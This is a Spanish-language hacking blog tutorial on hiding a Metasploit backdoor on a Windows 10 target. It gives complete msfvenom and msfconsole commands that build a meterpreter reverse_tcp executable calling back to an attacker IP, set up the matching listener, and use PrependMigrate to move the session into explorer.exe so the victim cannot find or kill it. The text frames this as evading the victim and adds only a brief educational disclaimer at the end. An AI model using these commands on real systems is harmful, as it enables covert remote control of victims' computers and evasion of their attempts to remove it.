En este artículo, conocerás la fuerza de mfsvenom junto con PrependMigrate. También aprenderás cómo migrar el payload a los procesos que se ejecutan actualmente en la máquina de destino para que así la víctima no pueda encontrar el archivo malicioso.
Es muy importante migrar tu backdoor payload porque si el objetivo es alertado y decide tomar medidas para matar el proceso, tu sesión también será ‘matada‘. Por lo tanto, un atacante debe hacer esto tan pronto como se abra la sesión.
1. Terminologías Básicas
1.1. Metasploit Framework
Metasploit Framework, una herramienta de código abierto para desarrollar y ejecutar código de exploit contra una máquina de destino remota.
Los pasos para explotar un sistema usando el Framework incluyen:
- Elegir y configurar un exploit
- Comprobar si el sistema objetivo previsto es susceptible al exploit elegido
- Elegir y configurar una payload
- Elegir la técnica de encoding
- Ejecutar el exploit.
Este enfoque modular, que permite la combinación de cualquier exploit con cualquier payload, es la principal ventaja de Framework. Facilita las tareas de los atacantes, los escritores de exploits y los escritores de payload.
1.2. Msfvenom
MSFvenom es una combinación de Msfpayload y Msfencode, que pone ambas herramientas en una sola instancia de Framework. Se utiliza para generar y codificar varios tipos de payload que están disponibles en Metasploit Framework. Las ventajas de msfvenom son:
- Una sola herramienta
- Opciones de línea de comandos estandarizadas
- Mayor velocidad
1.3. PrependMigrate
PrependMigrate es una opción que nos permite vincular nuestra sesión con un proceso continuo en el sistema de destino. También puede transferir una sesión vinculándola de un proceso a otro. Resulta útil ya que es difícil para el objetivo/víctima encontrar el proceso malicioso, por lo que se vuelve fundamental para el atacante cubrir sus huellas.
Configuraciones utilizadas en este tutorial:
Atacante:
- SO: Parrot OS (O puedes usar Kali Linux; consultar Mejores distribuciones de Linux para Pentesting y Hacking)
- IP: 192.168.1.61
Objetivo:
- SO: Windows 10
- IP: 192.168.1.63
2. Método 1: Con MSFvenom
Comencemos el juego de ocultar y buscar. Tienes que esconderte para salvarte y dejar que el objetivo intente encontrarte.
Comenzando con MSFvenom, crearemos un ejecutable malicioso llamado esgeeks.exe
y ocultaremos el ejecutable generado detrás de un proceso llamado explorer.exe
(puedes elegir cualquier proceso que se ejecute en el administrador de tareas) mediante el proceso PrependMigrate.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.61 lport=1234 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > esgeeks.exe
A continuación, cargaremos el Metasploit framework en Parrot utilizando la palabra clave msfconsole
.
Luego configura las siguientes opciones para habilitar nuestro handler:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 1234
exploit
Ahora, enviaremos la payload (archivo .exe
) a la máquina de destino y ejecutaremos el ejecutable en la máquina de destino. Esto generará una sesión de meterpreter que será capturada por el oyente que creamos anteriormente.
Para escapar de esta situación, la primera responsabilidad del atacante es ocultar la payload ejecutable detrás de un proceso para que la víctima no pueda identificarlo de ninguna manera posible.
Use el siguiente comando ps
para verificar los procesos que se están ejecutando actualmente y filtra con esgeeks.exe
ps | grep esgeeks.exe
El ID de proceso (PID) de esgeeks.exe
es decir 5396
como se muestra en la lista de procesos (será diferente para tu caso) y si la víctima mata el esgeeks.exe
es decir el PID 5396
, entonces el proceso en ejecución finalizará. Por lo tanto, finalizamos nuestra sesión con un comando simple:
kill 5396
Pero no necesitas preocuparte ya que PrependMigrate ahorra el trabajo al permitirnos ocultar esgeeks.exe
detrás del explorer.exe
y tendrás una ventaja ya que tu sesión de meterpreter aún se está ejecutando. Incluso después de que el sistema se reinicie, el Meterpreter en el sistema de la víctima intenta conectarse con nosotros cada 5 segundos hasta que haya abierto una sesión para nosotros. Y puedes usar el comando sysinfo
para confirmar que la sesión todavía está en funcionamiento.
3. Método 2: Sin MSFvenom
La segunda forma de ocultar shells usando PrependMigrate pero sin usar msfvenom. Aquí, el objetivo es el mismo que el anterior. Comenzaremos abriendo el Metasploit Framework.
Luego usa el siguiente conjunto de comandos para crear tu payload:
use windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o geek.exe
Después de la creación del ejecutable malicioso, es decir, geek.exe
, crearemos un escucha/ multi/handler utilizando los siguientes comandos:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 4444
exploit
Usando el comando ps
junto con el comando grep
obtendremos el PID de geek.exe
, por ejemplo 4152.
ps | grep geek.exe
Ahora intentamos matar el proceso geek.exe
para ocultar a la víctima con el siguiente comando:
kill 4152
Pero aún así, tienes una sesión de víctima, lo que significa que geek.exe
migra al nuevo id de proceso de explorer.exe
. Y puedes usar el comando sysinfo
u otros comandos, para confirmar que la sesión todavía está en funcionamiento.
Así es como un hacker se oculta. El propósito de este artículo es servir de información, ya que uno debe saber cómo ubicar y eliminar al atacante, así como cómo esconderse cuando estás al otro lado de la línea.
Algunas recomendaciones extras:
- Hackear Windows 7/8/10 con Framework CHAOS
- Cómo Hackear Windows con Metasploit Framework
- Explotación Windows usando archivo de contacto VCF (Sitio Web)
Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! 🙂
¿Te ha gustado este artículo? Sígue este blog en su fanpage de Facebook, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!